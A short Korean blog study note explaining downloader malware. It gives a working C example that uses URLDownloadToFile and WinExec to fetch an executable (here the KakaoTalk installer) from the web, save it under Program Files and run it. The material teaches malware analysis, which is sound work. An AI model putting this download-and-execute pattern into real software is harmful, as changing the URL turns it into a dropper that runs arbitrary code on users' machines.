728x90
Downloader이란?
- 주요 API
- URLDownloadToFile: 인터넷에서 비트를 다운로드하여 파일에 저장한다.
- WinExec: 지정된 응용 프로그램을 실행한다.
- 동작 방식
실습
프로젝트 파일을 열면 다음과 같이 코드가 나온다
#include <windows.h>
#pragma comment(lib, "urlmon.lib")
int main()
{
LoadLibrary(L"urlmon.dll");
HRESULT hResult = URLDownloadToFile(0,
L"http://app.pc.kakao.com/talk/win32/KakaoTalk_Setup.exe",
L"c:\\Program Files\\a.exe", 0,0);
WinExec("c:\\Program Files\\a.exe", SW_SHOW);
return 0;
}
여기서 URLDownloadToFile 이라는 api를 사용하여 dll로부터 카카오톡 파일을 다운받겠다! 라고 선언이 되어 있음
그리고 그걸 a.exe로 저장을 하고 실행을 한다~ 라는 내용
그리고 실제 실행을 해보면 이렇게 나온다
와웅~
728x90
'study > 보안' 카테고리의 다른 글
| 웜 악성코드의 이해 (0) | 2024.02.04 |
|---|---|
| 트로이목마(드로퍼)란? (1) | 2024.02.04 |
| 수동 언패킹 실습 (0) | 2024.02.02 |
| UPX 언패킹 실습 (0) | 2024.01.31 |
| IDA 단축키 모음 (0) | 2023.09.15 |